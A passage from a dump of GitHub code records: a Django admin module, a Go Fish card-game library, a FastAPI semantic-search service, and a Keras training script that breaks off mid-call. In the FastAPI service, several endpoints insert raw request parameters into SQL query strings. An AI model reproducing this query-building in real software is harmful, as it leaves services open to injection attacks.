        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n autocomplete_fields = ['current_round']\n readonly_fields = (circuits, rounds) \n\nclass CircuitAdmin(admin.ModelAdmin):\n\n list_display = (\n 'name',\n 'region',\n 'tier',\n 'season'\n ) \n\n\n def teams(self):\n links = ''\n for obj in self.teams.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n \n search_fields = ('name',)\n readonly_fields = (teams,) \n\nclass GroupAdmin(admin.ModelAdmin):\n \n list_display = (\n 'circuit',\n 'name',\n 'number',\n ) \n\n def teams(self):\n links = ''\n for obj in self.teams.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n \n search_fields = ('name', 'circuit__name')\n readonly_fields = (teams,) \n\nclass RoundAdmin(admin.ModelAdmin):\n \n list_display = (\n 'season',\n 'round_number',\n 'name',\n ) \n\n search_fields = ('season__name',)\n\n ordering = ['-id']\n\nadmin.site.register(League, LeagueAdmin)\nadmin.site.register(Season, SeasonAdmin)\nadmin.site.register(Circuit, CircuitAdmin)\nadmin.site.register(Group, GroupAdmin)\nadmin.site.register(Round, RoundAdmin)\n","repo_name":"dadcore-digital/buzz","sub_path":"leagues/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"6443304811","text":"#!/usr/bin/env python3\n\nimport random\n\nTOP = 'top'\nBOTTOM = 'bottom'\n\n#go fish actions\nDNH='dnh', #does not have\nRCV='rcv', #received cards\nTAT='tat', #takes a trick\nGOF='gof', #went fishing\nGFC='gfc', #go fish card, continue turn\nRDH='rdh', #ran out of cards, redealt\n\nFRENCH_SUITS = list('cdhs')\nSTAR_SUITS = list('cdhst')\nWHITE_SYMBOL_SUITS = list('♧♢♡♤☆')\nBLACK_SYMBOL_SUITS = list('♣♦♥♠★')\n\nFRENCH_RANKS = list('A23456789TJQK')\nKNIGHT_RANKS = list('A23456789TJNQK')\n\nLETTER_2_BLACK_SYMBOL = {\n'c':'♣',\n'd':'♦',\n'h':'♥',\n's':'♠',\n't':'★',\n'':'',\n}\n\nLETTER_2_WHITE_SYMBOL = {\n'c':'♧',\n'd':'♢',\n'h':'♡',\n's':'♤',\n't':'☆',\n'':'',\n}\n\nDEFAULT_SORT_DICT = {\n 'ranks':{\n 'j':0,\n 'A':1,\n '2':2,\n '3':3,\n '4':4,\n '5':5,\n '6':6,\n '7':7,\n '8':8,\n '9':9,\n 'T':10,\n 'J':11,\n 'N':12,\n 'Q':13,\n 'K':14,\n },\n 'suits':{\n '':0,\n 'c':1,\n 'd':2,\n 'h':3,\n 's':4,\n 't':5,\n },\n}\n\nBIGA_SORT_DICT = {\n 'ranks':{\n 'j':0,\n '2':2,\n '3':3,\n '4':4,\n '5':5,\n '6':6,\n '7':7,\n '8':8,\n '9':9,\n 'T':10,\n 'J':11,\n 'N':12,\n 'Q':13,\n 'K':14,\n 'A':15,\n },\n 'suits':{\n '':0,\n 'c':1,\n 'd':2,\n 'h':3,\n 's':4,\n 't':5,\n },\n}\n\nPOKER_SORT_DICT = {\n 'ranks':{\n 'j':0,\n '2':2,\n '3':3,\n '4':4,\n '5':5,\n '6':6,\n '7':7,\n '8':8,\n '9':9,\n 'T':10,\n 'J':11,\n 'N':12,\n 'Q':13,\n 'K':14,\n 'A':15,\n },\n}\n\nSUIT_SORT_DICT = {\n 'suits':{\n '':0,\n 'c':1,\n 'd':2,\n 'h':3,\n 's':4,\n 't':5,\n },\n}\n\n\ndef new_deck(**kwargs):\n shuffle = kwargs.get('shuffle', False)\n jokers = kwargs.get('jokers', 0)\n ranks = kwargs.get('ranks', FRENCH_RANKS)\n suits = kwargs.get('suits', FRENCH_SUITS)\n deck = Stack()\n for _ in range(jokers):\n deck.add(Card('j', ''), BOTTOM)\n for rank in ranks:\n for suit in suits:\n deck.add(Card(rank,suit), BOTTOM)\n if shuffle:\n deck.shuffle()\n return deck\n\n\ndef check_term(term, ranks=KNIGHT_RANKS, suits=STAR_SUITS):\n return isinstance(term, str) and len(term) == 2 and \\\n term[0] in ranks and term[1] in suits\n\n\nclass Card:\n def __init__(self, rank_or_value, suit=None):\n if suit is None:\n assert len(rank_or_value) == 2, \"object provided must be length 2\"\n self.rank = rank_or_value[0]\n self.suit = rank_or_value[1]\n else:\n self.rank = rank_or_value\n self.suit = suit\n\n def __iter__(self):\n return iter(str(self))\n\n def __len__(self):\n return 2\n\n def __getitem__(self, item):\n if item in [0, 'rank']:\n return self.rank\n elif item in [1, 'suit']:\n return self.suit\n else:\n raise KeyError(\"valid keys for Card: 0, 1, 'ranks', 'suits'\")\n\n def __eq__(self, other, sort_dict=DEFAULT_SORT_DICT):\n return sort_dict['ranks'][self.rank] == sort_dict['ranks'][other[0]] and \\\n sort_dict['suits'][self.suit] == sort_dict['suits'][other[1]]\n eq = __eq__\n\n def __ne__(self, other, sort_dict=DEFAULT_SORT_DICT):\n return not self.eq(other, sort_dict)\n ne = __ne__\n\n def __gt__(self, other, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n if ranks_first:\n if sort_dict['ranks'][self.rank] > sort_dict['ranks'][other[0]]:\n return True\n elif sort_dict['ranks'][self.rank] == sort_dict['ranks'][other[0]]:\n if sort_dict['suits'][self.suit] > sort_dict['suits'][other[1]]:\n return True\n else:\n return False\n else:\n return False\n else:\n if sort_dict['suits'][self.suit] > sort_dict['suits'][other[1]]:\n return True\n elif sort_dict['suits'][self.suit] == sort_dict['suits'][other[1]]:\n if sort_dict['ranks'][self.rank] > sort_dict['ranks'][other[0]]:\n return True\n else:\n return False\n else:\n return False\n gt = __gt__\n\n def __lt__(self, other, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n if ranks_first:\n if sort_dict['ranks'][self.rank] < sort_dict['ranks'][other[0]]:\n return True\n elif sort_dict['ranks'][self.rank] == sort_dict['ranks'][other[0]]:\n if sort_dict['suits'][self.suit] < sort_dict['suits'][other[1]]:\n return True\n else:\n return False\n else:\n return False\n else:\n if sort_dict['suits'][self.suit] < sort_dict['suits'][other[1]]:\n return True\n elif sort_dict['suits'][self.suit] == sort_dict['suits'][other[1]]:\n if sort_dict['ranks'][self.rank] < sort_dict['ranks'][other[0]]:\n return True\n else:\n return False\n else:\n return False\n lt = __lt__\n\n def __ge__(self, other, sort_dict=DEFAULT_SORT_DICT):\n return self.gt(other, sort_dict) or self.eq(other, sort_dict)\n ge = __ge__\n\n def __le__(self, other, sort_dict=DEFAULT_SORT_DICT):\n return self.lt(other, sort_dict) or self.eq(other, sort_dict)\n le = __le__\n\n def __str__(self, symbols=None):\n symdict = {\n None:self.suit,\n 'black':LETTER_2_BLACK_SYMBOL[self.suit],\n 'white':LETTER_2_WHITE_SYMBOL[self.suit],\n }\n suit = symdict.get(symbols, self.suit)\n return self.rank + suit\n str = __str__\n\n def __repr__(self):\n return \"Card({}, {})\".format(self.rank, self.suit)\n\n\nclass Stack:\n def __init__(self, cards=[]):\n self.cards = [Card(thing) for thing in cards]\n self.sort_dict = None\n\n def __str__(self, symbols=None):\n list = [card.str(symbols) for card in self.cards]\n return \"{}\".format(list)\n str = __str__\n\n def __repr__(self):\n return \"Stack({})\".format(str(self))\n\n def list(self):\n return self.cards\n\n def tuple(self):\n return tuple(self.cards)\n\n def __set__(self):\n return set(self.cards)\n\n def __iter__(self):\n return iter(self.cards)\n\n def __getitem__(self, item):\n return self.cards[item]\n\n def __len__(self):\n return len(self.cards)\n\n def __eq__(self, other):\n return self.cards == other.cards\n\n def __ne__(self, other):\n return not self == other\n\n @property\n def size(self):\n return len(self.cards)\n\n def shuffle(self, times=1):\n for _ in range(times):\n random.shuffle(self.cards)\n\n def compare_stacks(self, other, to_sort=True):\n x = self.copy()\n y = other.copy()\n if to_sort:\n x.sort()\n y.sort()\n return x == y\n\n def add(self, card, end=TOP):\n card = Card(card)\n if end is TOP:\n self.cards.insert(0, card)\n elif end is BOTTOM:\n self.cards.append(card)\n else:\n raise ValueError(\"end is not 'TOP' or 'BOTTOM'\")\n\n def add_list(self, cards, end=TOP):\n cards = list(cards)\n if end is TOP:\n self.cards = cards + self.cards\n elif end is BOTTOM:\n self.cards = self.cards + cards\n else:\n raise ValueError(\"end is not 'TOP' or 'BOTTOM'\")\n\n def deal(self, num=1, end=TOP):\n stack = []\n if end is TOP:\n x = 0\n elif end is BOTTOM:\n x = -1\n else:\n raise ValueError(\"end is not 'TOP' or 'BOTTOM'\")\n for i in range(num):\n try:\n stack.append(self.cards[x])\n del self.cards[x]\n except IndexError:\n return Stack(stack)\n return Stack(stack)\n\n def empty(self, return_cards=False):\n if return_cards:\n x = self.cards\n else:\n x = None\n self.cards = []\n return x\n\n def is_empty(self):\n return True if self.cards == [] else False\n\n def find(self, term, limit=0):\n return_list = []\n for card in self.cards:\n if term in card or str(term) == card:\n return_list.append(self.cards.index(card))\n if (not (limit <= 0)) and len(return_list) == limit:\n return return_list\n return return_list\n\n def find_list(self, terms, limit=0):\n return_list =[]\n for term in terms:\n return_list.append(self.find(term, limit))\n return return_list\n\n def get(self, term, limit=0):\n return_list = []\n for card in self.cards:\n if term in card or str(term) == card:\n return_list.append(card)\n if (not (limit <= 0)) and len(return_list) == limit:\n return return_list\n return return_list\n\n def get_list(self, terms, limit=0):\n return_list =[]\n for term in terms:\n return_list += self.get(term, limit)\n return return_list\n\n def insert(self, card, index=-1):\n self.cards.insert(index, card)\n\n def insert_list(self, cards, index=-1):\n self.cards.insert(index, cards)\n\n def remove(self, term):\n for card in self.cards[:]:\n if term in card or term == card:\n self.cards.remove(card)\n\n def remove_list(self, terms):\n card_list = self.get_list(terms)\n for card in card_list:\n self.cards.remove(card)\n\n def random_card(self, remove=False, num=1):\n card = random.sample(self.cards, num)[0]\n if remove:\n del self.cards[self.cards.index(card)]\n return card\n\n def reverse(self):\n self.cards = self.cards[::-1]\n\n def set_cards(self, cards):\n self.cards = list(cards)\n\n def split(self, index=None):\n if index is None:\n index = len(self.cards) // 2\n return Stack(self.cards[:index]), Stack(self.cards[index:])\n\n def copy(self):\n return Stack(self.cards)\n\n def max(self, num=1, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n temp = self.copy()\n temp.sort(sort_dict, ranks_first, True)\n return_list = []\n for i in range(num):\n return_list.append(temp.cards[i])\n return return_list\n\n def min(self, num=1, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n temp = self.copy()\n temp.sort(sort_dict, ranks_first, False)\n return_list = []\n for i in range(num):\n return_list.append(temp.cards[i])\n return return_list\n\n def sort(self, sort_dict=DEFAULT_SORT_DICT, ranks_first=True, reverse=False):\n if sort_dict != self.sort_dict:\n self.sort_dict = sort_dict\n if 'suits' in self.sort_dict and 'ranks' in self.sort_dict:\n if ranks_first:\n ranks_dict = {}\n for card in self.cards:\n if card.rank in ranks_dict:\n ranks_dict[card.rank].append(card)\n else:\n ranks_dict[card.rank] = [card]\n for rank in ranks_dict:\n ranks_dict[rank].sort(key=self._sort_key_func_card_suit, reverse=reverse)\n ranks_list = list(ranks_dict)\n ranks_list.sort(key=self._sort_key_func_rank, reverse=reverse)\n self.cards = []\n for rank in ranks_list:\n for card in ranks_dict[rank]:\n self.cards.append(card)\n else:\n suits_dict = {}\n for card in self.cards:\n if card.suit in suits_dict:\n suits_dict[card.suit].append(card)\n else:\n suits_dict[card.suit] = [card]\n for suit in suits_dict:\n suits_dict[suit].sort(key=self._sort_key_func_card_rank, reverse=reverse)\n suits_list = list(suits_dict)\n suits_list.sort(key=self._sort_key_func_suit, reverse=reverse)\n self.cards = []\n for suit in suits_list:\n for card in suits_dict[suit]:\n self.cards.append(card)\n elif 'ranks' in self.sort_dict:\n self.cards.sort(key=self._sort_key_func_card_rank, reverse=reverse)\n elif 'suits' in self.sort_dict:\n self.cards.sort(key=self._sort_key_func_card_suit, reverse=reverse)\n else:\n raise KeyError(\"'suits' or 'ranks' not found in sorting dictionary\")\n\n def is_sorted(self, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n other = self.copy()\n other.sort(sort_dict, ranks_first)\n return self == other\n\n def _sort_key_func_rank(self, rank):\n return self.sort_dict['ranks'][rank]\n\n def _sort_key_func_suit(self, suit):\n return self.sort_dict['suits'][suit]\n\n def _sort_key_func_card_rank(self, card):\n return self.sort_dict['ranks'][card.rank]\n\n def _sort_key_func_card_suit(self, card):\n return self.sort_dict['suits'][card.suit]\n\n\nclass GoFishGame:\n def __init__(self, ranks=FRENCH_RANKS, suits=FRENCH_SUITS):\n self.deck = new_deck(ranks=ranks, suits=suits, shuffle=True)\n self.ranks = ranks\n self.suits = suits\n self.players = []\n self.hand_size = 6 if len(self.players) < 5 else 5\n self.quit = False\n\n def prepare(self):\n assert len(self.players) in (3,4,5,6), \"go fish supports 3-6 players\"\n random.shuffle(self.players) #first player chosen at random\n if self.verbose:\n print('='*80)\n print(\"Player order:\")\n for player in self.players:\n print(\"{}. {}\".format(self.players.index(player)+1, player))\n for player in self.players:\n player.hand = self.deck.deal(self.hand_size)\n for player in self.players:\n player.prepare()\n self.continue_prompt()\n\n def run(self, verbose=True, symbols=None):\n self.verbose = verbose\n self.symbols = symbols\n self.prepare()\n while not self.quit:\n for player in self.players:\n if self.quit:\n break\n if self.verbose:\n print('='*80)\n print(\"{}'s turn:\".format(player.name))\n print(\"Number of cards: {}\".format(player.num_cards))\n print(\"Tricks: {}\".format(player.tricks))\n print(\"Points: {}\".format(player.points))\n self.continue_prompt()\n while not self.quit:\n if self.verbose:\n print('='*80)\n player.hand.sort()\n if not player.hand.is_empty():\n askee, rank = player.ask()\n else:\n if self.deck.is_empty():\n if self.verbose:\n print(\"{} has no cards and the deck is empty!\".format(player))\n break\n else:\n self.check_for_empty(askee)\n askee, rank = player.ask()\n cards = askee.hand.get(rank)\n if self.verbose:\n print(\"{} asked {} for a {}!\".format(player, askee, rank))\n if cards == []:\n self.update_players(DNH, player, askee, rank)\n if self.verbose:\n print(\"{} said to go fish!\".format(askee))\n if self.deck.is_empty():\n if self.verbose:\n print(\"The deck is empty!\")\n self.continue_prompt()\n break\n else:\n card = self.deck.deal()[0]\n player.hand.add(card)\n if rank == card.rank:\n self.update_players(GFC, player, rank)\n if self.verbose:\n print(\"{} went fishing and drew a {}!\".format(player, rank))\n self.check_for_tricks(player)\n else:\n self.update_players(GOF, player)\n if self.verbose:\n print(\"{} went fishing!\".format(player))\n self.check_for_tricks(player)\n if self.verbose:\n self.continue_prompt()\n break\n else:\n self.update_players(RCV, player, askee, rank, len(cards))\n askee.hand.remove_list([str(card) for card in cards])\n player.hand.add_list(cards)\n if self.verbose:\n print(\"{} gave {} {}(s) to {}!\".format(askee, len(cards), rank, player))\n self.check_for_tricks(player)\n self.check_for_empty(askee)\n self.check_for_empty(player)\n if self.verbose:\n self.continue_prompt()\n print(\"Game exited.\")\n\n def add_player(self, player, name, *args, **kwargs):\n self.players.append(player(name, self, *args, **kwargs))\n\n def check_for_empty(self, player):\n if player.hand.is_empty() and not self.quit:\n player.hand = self.deck.deal(self.hand_size)\n self.update_players(RDH, player)\n if self.verbose:\n print(\"{} ran out of cards!\".format(player))\n print(\"{} was redealt {} cards!\".format(player, len(player.hand)))\n self.check_for_tricks(player)\n\n def check_for_tricks(self, player):\n tricks = {}\n for card in player.hand:\n if card.rank in tricks:\n tricks[card.rank] += 1\n else:\n tricks[card.rank] = 1\n for rank in tricks:\n if tricks[rank] == len(self.suits):\n player.tricks.append(rank)\n player.hand.remove_list([rank])\n if self.verbose:\n print(\"{} takes a trick of {}s!\".format(player, rank))\n self.update_players(TAT, player, rank)\n self.check_for_win()\n\n def check_for_win(self):\n tricks_list = []\n for player in self.players:\n tricks_list += player.tricks\n if len(tricks_list) == len(self.ranks):\n self.quit = True\n if self.verbose:\n print('='*80)\n print(\"The game is over!\")\n self.players.sort(key=self._sort_key_func_player_tricks, reverse=True)\n for player in self.players:\n print(\"{}. {}, with {} point(s)\".format(self.players.index(player)+1, player, player.points))\n return\n\n def _sort_key_func_player_tricks(self, player):\n return player.points\n\n def continue_prompt(self):\n r = input(\"Press [Enter] to continue (or type 'q' to quit): \")\n if r.lower() in ('q', 'quit'):\n r = input(\"Are you sure you want to quit? (y/n): \")\n if r.lower() in ('y', 'yes'):\n self.quit = True\n\n def update_players(self, action, *args):\n for player in self.players:\n player.update(action, *args)\n\n\nclass GoFishPlayer:\n def __init__(self, name, game):\n self.name = name\n self.game = game\n self.hand = Stack()\n self.tricks = []\n\n def __str__(self):\n return self.name\n\n @property\n def points(self):\n return len(self.tricks)\n\n @property\n def num_cards(self):\n return len(self.hand)\n\n def prepare(self):\n pass\n\n def update(self, action, *args):\n pass\n\n def ask(self):\n raise Exception(\"'ask' method should be overwritten in child class\")\n\n\nclass GoFishHuman(GoFishPlayer):\n def ask(self):\n print(\"Your cards: \", self.hand.str(self.game.symbols))\n askee = self.ask_for_askee()\n rank = self.ask_for_rank()\n return askee, rank\n\n def ask_for_askee(self):\n player_list = self.game.players[:]\n player_list.remove(self)\n str_list = [str(player) for player in player_list]\n while True:\n askee = input(\"Who do you want to ask? {}: \".format(str_list))\n if askee in str_list:\n askee = player_list[str_list.index(askee)]\n return askee\n else:\n print(\"That is not a player in the game.\")\n\n def ask_for_rank(self):\n ranks_list = [card.rank for card in self.hand]\n while True:\n rank = input(\"What rank do you want to ask for? \")\n if rank in ranks_list:\n return rank\n else:\n print(\"That is not a rank in your hand.\")\n\n\nclass GoFishAIPerfectMemory(GoFishPlayer):\n def __init__(self, name, game, memory_percent=1):\n GoFishPlayer.__init__(self, name, game)\n self.memory_percent = memory_percent\n self.memory = {}\n self.update_dict = {\n DNH:self.update_DNH,\n RCV:self.update_RCV,\n TAT:self.update_TAT,\n GOF:self.update_GOF,\n GFC:self.update_GFC,\n RDH:self.update_RDH,\n }\n\n def prepare(self):\n for player in self.game.players:\n self.memory[player] = {\n 'has':{},\n 'dnh':[],\n }\n\n def update(self, action, *args):\n self.update_dict[action](*args)\n\n def update_DNH(self, player, askee, rank):\n if not rank in self.memory[player]['has']:\n self.memory[player]['has'][rank] = 1\n self.memory[askee]['dnh'].append(rank)\n\n def update_RCV(self, player, askee, rank, num):\n if rank in self.memory[player]['has']:\n self.memory[player]['has'][rank] += num\n else:\n self.memory[player]['has'][rank] = num + 1\n if rank in self.memory[askee]['has']:\n del self.memory[askee]['has'][rank]\n self.memory[askee]['dnh'].append(rank)\n\n def update_TAT(self, player, rank):\n if rank in self.memory[player]['has']:\n del self.memory[player]['has'][rank]\n\n def update_GOF(self, player):\n self.memory[player]['dnh'] = []\n\n def update_GFC(self, player, rank):\n self.memory[player]['has'][rank] += 1\n\n def update_RDH(self, player):\n self.memory[player]['has'] = {}\n self.memory[player]['dnh'] = []\n\n def ask(self):\n player_list = [player for player in self.memory]\n card_list = [card for card in self.hand]\n for player in player_list:\n if player == self:\n continue\n for card in card_list:\n if card.rank in self.memory[player]['has']:\n return player, card.rank\n random.shuffle(player_list)\n random.shuffle(card_list)\n for player in player_list:\n if player == self:\n continue\n for card in card_list:\n if not card.rank in self.memory[player]['dnh']:\n return player, card.rank\n\n\nclass GoFishAIRandom(GoFishPlayer):\n def ask(self):\n player_list = self.game.players[:]\n player_list.remove(self)\n askee = random.choice(player_list)\n ranks_list = [card.rank for card in self.hand]\n rank = random.choice(ranks_list)\n return askee, rank\n\n\ndef main():\n g = GoFishGame(ranks=FRENCH_RANKS, suits=FRENCH_SUITS)\n g.add_player(GoFishAIRandom, input(\"Name AI 1: \"))\n g.add_player(GoFishAIPerfectMemory, input(\"Name AI 2: \"))\n g.add_player(GoFishHuman, input(\"Name player 1: \"))\n g.add_player(GoFishHuman, input(\"Name player 2: \"))\n g.run(symbols='black')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Binary-Ninja/go-pie","sub_path":"pydeck.py","file_name":"pydeck.py","file_ext":"py","file_size_in_byte":24477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70612503891","text":"from contextlib import asynccontextmanager\nfrom app.utils import log_sql\nfrom app.types import Documents, Document, DocumentData, DocumentDataFull\nfrom app.third_party.txtai import initialize_embeddings, get_embeddings_by_user\nfrom app.third_party.firebase_admin import initialize_firebase_admin, verify_firebase_token\nfrom starlette.requests import Request\nimport datetime\nimport json\nimport os\n\nfrom fastapi import FastAPI, Depends\nfrom fastapi.middleware.cors import CORSMiddleware\n@asynccontextmanager\nasync def startup(app: FastAPI):\n # initialize embeddings so it loads faster later\n initialize_embeddings()\n initialize_firebase_admin()\n yield\n\nrouter = FastAPI(\n lifespan=startup,\n dependencies=[Depends(verify_firebase_token), Depends(get_embeddings_by_user)]\n)\norigins = [os.environ['FRONTEND_URL']]\nrouter.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n@router.get(\"/recipients\", response_model=list[str])\nasync def recipients(request: Request, source: str):\n if not request.state.has_data: return []\n embeddings = request.state.embeddings\n sql_query = f'SELECT DISTINCT recipient FROM txtai WHERE source = \"{source}\" LIMIT 100'\n log_sql(sql_query)\n recipients = embeddings.search(sql_query)\n embeddings.close()\n has_recipient = lambda recipient: 'recipient' in recipient and recipient['recipient']\n return [recipient['recipient'] for recipient in recipients if has_recipient(recipient)]\n\ndef format_data_response(docs: list[DocumentData]):\n return [json.loads(doc['data']) for doc in docs]\n\n@router.get(\"/search\", response_model=list[DocumentDataFull])\nasync def search(\n request: Request,\n q: str,\n from_date: str = None,\n to_date: str = None,\n limit: int = 100,\n offset: int = 0,\n sort_by: str = \"timestamp_ms\",\n order: str = \"desc\",\n recipient: str = \"\",\n source: str = \"\",\n):\n sql_query = f'SELECT data FROM txtai WHERE similar({q})'\n\n if from_date and to_date:\n sql_query += f' AND date BETWEEN \"{from_date}\" AND \"{to_date}\"'\n elif from_date:\n sql_query += f' AND date = \"{from_date}\"'\n elif to_date:\n sql_query += f' AND date = \"{to_date}\"'\n\n if recipient:\n sql_query += f' AND recipient = \"{recipient}\"'\n if source:\n sql_query += f' AND source = \"{source}\"'\n\n sql_query += f' LIMIT {limit}'\n\n log_sql(sql_query)\n\n embeddings = request.state.embeddings\n docs = embeddings.search(sql_query)\n embeddings.close()\n return format_data_response(docs)\n\n@router.get(\"/day\", response_model=list[DocumentDataFull])\nasync def day(request: Request, date: datetime.date, recipient: str, source: str):\n embeddings = request.state.embeddings\n sql_query = f'SELECT data FROM txtai WHERE date = \"{date}\" AND recipient = \"{recipient}\" AND source = \"{source}\" LIMIT 100'\n log_sql(sql_query)\n docs = embeddings.search(sql_query)\n embeddings.close()\n return format_data_response(docs)\n\n@router.get(\"/first_day\", response_model=list[DocumentDataFull])\nasync def first_day(request: Request, recipient: str, source: str):\n embeddings = request.state.embeddings\n # Find the first entry, get the date\n date_query = f'SELECT DATE(date) AS first_day FROM txtai WHERE recipient = \"{recipient}\" AND source = \"{source}\" ORDER BY date ASC LIMIT 1'\n log_sql(date_query)\n dates = embeddings.search(date_query)\n if not dates or len(dates) < 1 or 'first_day' not in dates[0]:\n return []\n first_day = dates[0]['first_day']\n\n # then get subsequent entries that have the same date\n sql_query = f'SELECT data FROM txtai WHERE date = \"{first_day}\" AND recipient = \"{recipient}\" AND source = \"{source}\" LIMIT 100'\n log_sql(sql_query)\n docs = embeddings.search(sql_query)\n embeddings.close()\n return format_data_response(docs)\n\n@router.get(\"/last_day\", response_model=list[DocumentDataFull])\nasync def last_day(request: Request, recipient: str, source: str):\n embeddings = request.state.embeddings\n # Find the first entry, get the date\n date_query = f'SELECT DATE(date) AS last_day FROM txtai WHERE recipient = \"{recipient}\" AND source = \"{source}\" ORDER BY date DESC LIMIT 1'\n log_sql(date_query)\n dates = embeddings.search(date_query)\n if not dates or len(dates) < 1 or 'last_day' not in dates[0]:\n return []\n last_day = dates[0]['last_day']\n\n # then get subsequent entries that have the same date\n sql_query = f'SELECT data FROM txtai WHERE date = \"{last_day}\" AND recipient = \"{recipient}\" AND source = \"{source}\" LIMIT 100'\n log_sql(sql_query)\n docs = embeddings.search(sql_query)\n embeddings.close()\n return format_data_response(docs)\n\ndef format_doc_data(data: DocumentData, source: str, recipient: str) -> DocumentDataFull:\n doc = DocumentDataFull(\n text=data.text,\n timestamp=int(data.timestamp),\n sender=data.sender,\n recipient=recipient,\n line_number=data.line_number,\n source_metadata=json.dumps(data.source_metadata),\n date=datetime.date.fromtimestamp(data.timestamp),\n source=source,\n )\n doc.date = doc.date.strftime(\"%Y-%m-%d\")\n return vars(doc)\n\n# txtai wants documents in tuples\ndef format_doc(data: DocumentData, source: str, recipient: str):\n return ('-'.join([recipient, str(data.timestamp)]), format_doc_data(data, source, recipient), \"\")\n\n# pass source/recipient to be stored for each document\ndef format_docs(docs: Documents) -> list[Document]:\n return [format_doc(doc, docs.source, docs.recipient) for doc in docs.docs]\n\n@router.post(\"/index\")\nasync def index(request: Request, docs: Documents):\n embeddings = request.state.embeddings\n formatted_docs = format_docs(docs)\n embeddings.upsert(formatted_docs)\n embeddings.save(path=request.state.user_path)\n embeddings.close()\n\n@router.delete(\"/delete\")\nasync def delete(request: Request, recipient: str, source: str):\n embeddings = request.state.embeddings\n sql_query = f'SELECT id FROM txtai WHERE recipient = \"{recipient}\" AND source = \"{source}\" LIMIT 10000'\n log_sql(sql_query)\n ids_to_delete = embeddings.search(sql_query)\n ids_deleted = embeddings.delete([id_to_delete['id'] for id_to_delete in ids_to_delete])\n embeddings.save(path=request.state.user_path)\n embeddings.close()","repo_name":"xiankai/vector-database","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5601523111","text":"import os\nfrom distutils.util import strtobool\n\nimport keras.backend as K\nfrom sklearn.model_selection import KFold\n\nfrom sarcopenia_ai.apps.slice_detection.callbacks import PreviewOutput\nfrom sarcopenia_ai.apps.slice_detection.dataloader import TrainerData\nfrom sarcopenia_ai.core.input_parser import InputParser\nfrom sarcopenia_ai.core.model_wrapper import allocate_tf_gpu_devices\nfrom .models import get_model\n\n\ndef parse_inputs():\n parser = InputParser()\n\n parser.add_argument('--restart', type=strtobool, default=False,\n help='restart training by deleting all associated files')\n parser.add_argument('--num_epochs', type=int, default=5, help='number of epochs for training')\n parser.add_argument('--batch_size', type=int, default=3,\n help='number of distinct images to samples from in a given batch')\n parser.add_argument('--img_batch_size', type=int, default=3,\n help='number of samples obtained from a single image in a given batch')\n parser.add_argument('--input_shape', type=int, default=None, nargs=3,\n help='image input shape')\n parser.add_argument('--model_input_shape', type=int, default=[None, None, 1], nargs=3,\n help='model input shape')\n parser.add_argument('--model_name', type=str, default='UNet', help='name of model')\n parser.add_argument('--dataset_path', type=str, default=None, help='location of dataset .npz')\n parser.add_argument('--n_splits', type=int, default=3,\n help='number of splits for cross validation')\n parser.add_argument('--random_state', type=int, default=42, help='random seed')\n parser.add_argument('--ds_factor', type=int, default=2, help='output downsampling factor')\n parser.add_argument('--input_spacing', type=int, default=1, help='spacing of input image')\n parser.add_argument('--num_val', type=int, default=20,\n help='number of validation samples during training')\n parser.add_argument('--do_crossval', type=strtobool, default=False, help='do cross validation')\n parser.add_argument('--flatten_output', type=strtobool, default=False,\n help='1D output if true; otherwise, the output is 2D')\n parser.add_argument('--use_cache', type=strtobool, default=True,\n help='cache input image pre-processing')\n parser.add_argument('--cache_path', type=str, default=None,\n\n help='path to store the pre-processed images. If None, then model_path is used')\n parser.add_argument('--mode', type=str, default='heatmap',\n help='labelmap as heatmap or regression', choices=['heatmap', 'reg'])\n parser.add_argument('--image_type', type=str, default='frontal', choices=['frontal', 'sagittal'])\n parser.add_argument('--cuda_devices', type=str, default='')\n parser.add_argument('--model_path', type=str, default='/tmp/slice_detection_1/')\n parser.add_argument('--sigma', type=float, default=3)\n parser.add_argument('--sampling_rate', type=float, default=0.5,\n help='rate to sample from crops that contain the slice')\n parser.add_argument('--do_augment', type=strtobool, default=True, help='enable augmentation')\n parser.add_argument('--preview_generator_output', type=strtobool, default=False,\n help='preview generator output')\n parser.add_argument('--preview_training_output', type=strtobool, default=False,\n help='preview intermediate training output')\n parser.add_argument('--preview_validation_steps', type=int, default=2)\n parser.add_argument('--regression_dual_output', type=strtobool, default=False,\n help='enable dual output for regression')\n parser.add_argument('--do_checkpoint', type=strtobool, default=False,\n help='enable model checkpoint saving')\n parser.add_argument('--workers', type=int, default=2)\n parser.add_argument('--steps_per_epoch', type=int, default=None)\n args = parser.parse()\n\n return args\n\n\ndef distance(y_true, y_pred):\n x_true = K.flatten(K.argmax(y_true, axis=1))\n valid = K.cast(K.sum(y_true, axis=(1, 2)) > 0.5, 'float32')\n\n x_pred = K.flatten(K.argmax(y_pred, axis=1))\n d = K.cast(x_true - x_pred, 'float32')\n return valid * d * d\n\n\ndef cross_validate(base_model, args):\n trainer_data = TrainerData(args)\n kf = KFold(n_splits=args.n_splits, random_state=args.random_state, shuffle=True)\n\n for idx, (train_index, val_index) in enumerate(kf.split(list(range(trainer_data.num_samples)))):\n print('cross validation step {} of {}'.format(idx + 1, args.n_splits))\n\n trainer_data.split_data(train_index, val_index)\n trainer_data.update_crossval_data(idx)\n trainer_data.save_train_val_split(True)\n\n if args.preview_generator_output:\n trainer_data.preview_generator_output()\n\n # Setup model\n model_name = args.model_name + '_cv_' + str(idx + 1) + '_of_' + str(args.n_splits)\n model_wrapper = base_model(model_dir=args.model_path,\n name=model_name,\n 